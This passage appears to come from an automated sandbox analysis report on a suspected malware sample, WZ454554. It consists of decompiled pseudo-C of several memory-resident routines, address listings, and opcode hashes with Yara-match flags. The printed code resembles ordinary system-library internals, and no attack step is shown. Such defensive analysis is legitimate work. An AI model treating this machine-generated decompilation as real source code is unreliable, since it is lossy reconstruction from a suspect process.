				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0xba5898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0xba58b0 = _t128;
								 *0xba58b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0xba58b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0xba58bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0xba58bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0xba58b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0xba5898 = 7;
										return _t75;
									} else {
										 *0xba5898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0xba5898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}











































                            0x00b71002
                            0x00b7100c
                            0x00b7100f
                            0x00b71012
                            0x00b71018
                            0x00000000
                            0x00b7102e
                            0x00b71030
                            0x00000000
                            0x00b71032
                            0x00b71032
                            0x00b71038
                            0x00b71038
                            0x00b7121e
                            0x00b711ff
                            0x00b71205
                            0x00b71207
                            0x00b7120c
                            0x00b7120e
                            0x00b71210
                            0x00b71212
                            0x00b71212
                            0x00b71210
                            0x00b7121c
                            0x00b7121c
                            0x00b71228
                            0x00b71228
                            0x00b7101c
                            0x00b7101c
                            0x00b7101c
                            0x00b7101f
                            0x00b71022
                            0x00b71025
                            0x00b7102c
                            0x00b7102c
                            0x00000000
                            0x00b7102c
                            0x00b71027
                            0x00b7102a
                            0x00b7103f
                            0x00b7103f
                            0x00b71042
                            0x00b71044
                            0x00b71047
                            0x00b71049
                            0x00b7104c
                            0x00b7104e
                            0x00b71088
                            0x00b71088
                            0x00b7108a
                            0x00b7108d
                            0x00b7108f
                            0x00b71091
                            0x00b71091
                            0x00b71093
                            0x00b71095
                            0x00b71097
                            0x00b710c8
                            0x00b710cb
                            0x00b710ce
                            0x00b710d0
                            0x00b710f4
                            0x00b710f4
                            0x00b710fa
                            0x00b71100
                            0x00b71102
                            0x00b71150
                            0x00b71150
                            0x00b71154
                            0x00b71167
                            0x00b7116a
                            0x00b7116a
                            0x00b71156
                            0x00b71156
                            0x00b71158
                            0x00b7115b
                            0x00b7115d
                            0x00b7115f
                            0x00b7115f
                            0x00b7115f
                            0x00b71162
                            0x00b71162
                            0x00b7116c
                            0x00b7116f
                            0x00b71171
                            0x00b7117b
                            0x00b7117b
                            0x00b7117d
                            0x00b71183
                            0x00b71183
                            0x00b71186
                            0x00b71188
                            0x00b71199
                            0x00b7118a
                            0x00b7118a
                            0x00b7118c
                            0x00b7118f
                            0x00b71191
                            0x00b71191
                            0x00b71191
                            0x00b71194
                            0x00b71194
                            0x00b7119c
                            0x00b711a2
                            0x00b711a8
                            0x00b711ac
                            0x00b711af
                            0x00b711c7
                            0x00b711b1
                            0x00b711b1
                            0x00b711b4
                            0x00b711b7
                            0x00b711b9
                            0x00b711b9
                            0x00b711b9
                            0x00b711bc
                            0x00b711c2
                            0x00b711c2
                            0x00b711cb
                            0x00b711ce
                            0x00b711d4
                            0x00b711e7
                            0x00b711ed
                            0x00b711ef
                            0x00000000
                            0x00000000
                            0x00b711f1
                            0x00000000
                            0x00b711d6
                            0x00b711d6
                            0x00000000
                            0x00b711d6
                            0x00b711d4
                            0x00b71104
                            0x00b71106
                            0x00000000
                            0x00000000
                            0x00b71108
                            0x00b7110c
                            0x00b7111d
                            0x00b7110e
                            0x00b7110e
                            0x00b71110
                            0x00b71113
                            0x00b71115
                            0x00b71115
                            0x00b71115
                            0x00b71118
                            0x00b71118
                            0x00b71126
                            0x00b7113a
                            0x00b7113d
                            0x00b7113f
                            0x00000000
                            0x00b71141
                            0x00b71141
                            0x00000000
                            0x00b71141
                            0x00b7113f
                            0x00b710d6
                            0x00b710d9
                            0x00b710dd
                            0x00b710e3
                            0x00b710e6
                            0x00b710e9
                            0x00000000
                            0x00000000
                            0x00b710ee
                            0x00b710f0
                            0x00b710f2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b710f2
                            0x00000000
                            0x00b71099
                            0x00b71099
                            0x00b7109c
                            0x00b7109c
                            0x00b7109e
                            0x00b710a0
                            0x00b710b3
                            0x00b710a2
                            0x00b710a2
                            0x00b710a4
                            0x00b710a7
                            0x00b710a9
                            0x00b710ab
                            0x00b710ab
                            0x00b710ab
                            0x00b710ae
                            0x00b710ae
                            0x00b710b6
                            0x00b710b9
                            0x00000000
                            0x00000000
                            0x00b710be
                            0x00b710c1
                            0x00b710c3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b710c3
                            0x00b710c5
                            0x00000000
                            0x00b710c5
                            0x00b71097
                            0x00b71050
                            0x00b71053
                            0x00b71056
                            0x00b71059
                            0x00b7105c
                            0x00b7105e
                            0x00b71060
                            0x00b71062
                            0x00b71064
                            0x00b71064
                            0x00b71062
                            0x00b71066
                            0x00b71069
                            0x00b7106b
                            0x00b7106d
                            0x00b7106f
                            0x00b71076
                            0x00b71076
                            0x00b71076
                            0x00000000
                            0x00b71076
                            0x00b71071
                            0x00b71074
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b71074
                            0x00b71079
                            0x00b71079
                            0x00b7107b
                            0x00b7107b
                            0x00b7107f
                            0x00b71082
                            0x00b71085
                            0x00000000
                            0x00b71085
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8ec43a1bbd381afa8a5260288c7a9e2904e66a30b50c53ef1c3ef0b362be4a63
                            • Instruction ID: e45c6743ccd5cf3b7831fd483da072c054a061547045bf68485ea97b412547c4
                            • Opcode Fuzzy Hash: 8ec43a1bbd381afa8a5260288c7a9e2904e66a30b50c53ef1c3ef0b362be4a63
                            • Instruction Fuzzy Hash: 44716F34A00761CBCB24CF5EC48067AB3F1FB44701B658CAED9AA9B640D775EE94DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00402D8B, Relevance: .2, Instructions: 187COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b951ff5533d3a717a7ede5a45a454844b00f9bdbe824ed76f47c139561909d73
                            • Instruction ID: 8f9455a2d9b34d2164fd2f91ecd66a629aa50051debc3f3bba28324c4bc946a7
                            • Opcode Fuzzy Hash: b951ff5533d3a717a7ede5a45a454844b00f9bdbe824ed76f47c139561909d73
                            • Instruction Fuzzy Hash: FD61D3B3E146214BD318CF19CC40676B792FFC8312B1B81BEDD1A9B297CE74A9419B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041ED4D, Relevance: .2, Instructions: 171COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0c2ae0a064da0aa65fbe5513fcd418318e4991af295599a16e1a84141e1d6477
                            • Instruction ID: a3e581215529cd48b923e1492074a4581e97829f74b8c21de89e3a15734e5337
                            • Opcode Fuzzy Hash: 0c2ae0a064da0aa65fbe5513fcd418318e4991af295599a16e1a84141e1d6477
                            • Instruction Fuzzy Hash: 2581A932A08781CFD715DF39D98AB413FB5F756324B44024ED8A2A31E6D778615ACF88
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00402D90, Relevance: .2, Instructions: 165COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                            • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                            • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                            • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE2AE4, Relevance: .2, Instructions: 159COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00AE2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0xba8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0xba8208; // 0xba8207
				_t8 = _t57 + 0xba8208; // 0xba8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0xba8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0xba821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0xba6d5c; // 0x7ffd0654
							_t72 =  *0xba6d5c; // 0x7ffd0654
							_t75 =  *0xba6d5c; // 0x7ffd0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0xba6d5c; // 0x7ffd0654
							_t84 =  *0xba6d5c; // 0x7ffd0654
							_t87 =  *0xba6d5c; // 0x7ffd0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E00AFF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                            0x00ae2ae4
                            0x00ae2aec
                            0x00ae2aef
                            0x00ae2af4
                            0x00ae2af7
                            0x00ae2afd
                            0x00ae2b92
                            0x00ae2b92
                            0x00ae2b97
                            0x00ae2b9c
                            0x00ae2b9c
                            0x00ae2b03
                            0x00ae2b06
                            0x00ae2b09
                            0x00ae2b09
                            0x00ae2b0f
                            0x00ae2b15
                            0x00ae2b15
                            0x00ae2b1b
                            0x00ae2b1e
                            0x00ae2b21
                            0x00ae2b26
                            0x00ae2b29
                            0x00ae2b81
                            0x00ae2b84
                            0x00ae2c0e
                            0x00ae2c15
                            0x00ae2c24
                            0x00ae2c24
                            0x00ae2b8a
                            0x00ae2b8a
                            0x00ae2b8a
                            0x00ae2b8a
                            0x00ae2b90
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ae2b4a
                            0x00ae2b4a
                            0x00ae2b4d
                            0x00ae2b53
                            0x00000000
                            0x00000000
                            0x00ae2b55
                            0x00ae2b58
                            0x00ae2bb7
                            0x00b25d1b
                            0x00b25d37
                            0x00b25d47
                            0x00b25d53
                            0x00ae2bbd
                            0x00ae2bbd
                            0x00ae2bbd
                            0x00ae2bb7
                            0x00ae2b5d
                            0x00ae2c2f
                            0x00b25d5b
                            0x00b25d77
                            0x00b25d87
                            0x00b25d93
                            0x00ae2c35
                            0x00ae2c35
                            0x00ae2c35
                            0x00ae2c2f
                            0x00ae2b65
                            0x00ae2b9f
                            0x00ae2ba2
                            0x00ae2b67
                            0x00ae2b67
                            0x00ae2b69
                            0x00ae2b6b
                            0x00ae2b6e
                            0x00ae2bc9
                            0x00ae2bcc
                            0x00ae2bcf
                            0x00ae2bd4
                            0x00ae2bd6
                            0x00ae2bd6
                            0x00ae2bdb
                            0x00ae2c02
                            0x00ae2c05
                            0x00ae2c07
                            0x00000000
                            0x00ae2c07
                            0x00ae2be0
                            0x00ae2c00
                            0x00ae2c3f
                            0x00ae2c3f
                            0x00000000
                            0x00ae2c00
                            0x00ae2be5
                            0x00ae2be7
                            0x00ae2bec
                            0x00ae2bf4
                            0x00ae2bf6
                            0x00000000
                            0x00ae2bf6
                            0x00ae2b70
                            0x00ae2b76
                            0x00ae2b2b
                            0x00ae2b2b
                            0x00ae2b2d
                            0x00ae2b2f
                            0x00ae2b32
                            0x00ae2b35
                            0x00ae2b3a
                            0x00000000
                            0x00ae2b40
                            0x00ae2b43
                            0x00ae2b45
                            0x00ae2b47
                            0x00ae2b4a
                            0x00ae2b4d
                            0x00ae2b53
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ae2b53
                            0x00ae2b78
                            0x00ae2b78
                            0x00ae2b7b
                            0x00ae2b7e
                            0x00000000
                            0x00ae2b7e
                            0x00ae2b76
                            0x00ae2ba5
                            0x00ae2ba5
                            0x00ae2ba8
                            0x00ae2bad
                            0x00000000
                            0x00000000
                            0x00ae2baf
                            0x00ae2baf
                            0x00ae2bc2
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6a2c297c5d4a5ea972d47f3f712acff31367f8c9e0a49cc18a8a3608882c8171
                            • Instruction ID: a862d9c62a78ae5e169f1a9a4c4d856b63130baa8bba4ff4b29b64226980a125
                            • Opcode Fuzzy Hash: 6a2c297c5d4a5ea972d47f3f712acff31367f8c9e0a49cc18a8a3608882c8171
                            • Instruction Fuzzy Hash: 8951B476B00165CFCB18DF1EC890ABDB7F5FB88700715856AE856AB324DB30AE51DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041E799, Relevance: .2, Instructions: 150COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eb812b37e2a3c05ee186b2c6a21f05f996fa949319b0aaa1b603225098736661
                            • Instruction ID: 7c1edd7f920080823b6fb118f472915437952a7ae44dd56b47bcf99a4add3eed
                            • Opcode Fuzzy Hash: eb812b37e2a3c05ee186b2c6a21f05f996fa949319b0aaa1b603225098736661
                            • Instruction Fuzzy Hash: FA71317690C781DFEB00DF78D89A6463FB2F752334708078AC9A2872D2D374656ACB45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADDBE9, Relevance: .1, Instructions: 149COMMON
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E00ADDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						L00ABCC50(L00AB4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(L00AD7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = L00B88ED6(_t102, _t98);
						}
						_t76 = _v44;
						E00AD2280(_t58, _v44);
						L00ADDD82(_v44, _t102, _t98);
						E00ADB944(_t102, _v5);
						return L00ACFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0xba8628; // 0x0
							_v28 = _t67;
							_t68 =  *0xba862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0xba8628; // 0x0
						_t105 = _v28;
						_t80 =  *0xba862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0xb7fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                            0x00addbe9
                            0x00addbf2
                            0x00addbf7
                            0x00addbf9
                            0x00addbfc
                            0x00addc00
                            0x00addc03
                            0x00addc14
                            0x00addd54
                            0x00addd54
                            0x00addd54
                            0x00addc18
                            0x00addc1d
                            0x00addc1d
                            0x00addc32
                            0x00addc3b
                            0x00addc3e
                            0x00addc46
                            0x00addd5b
                            0x00addd62
                            0x00addd64
                            0x00addd67
                            0x00addd69
                            0x00addd6b
                            0x00addd6e
                            0x00addd70
                            0x00addd73
                            0x00addd73
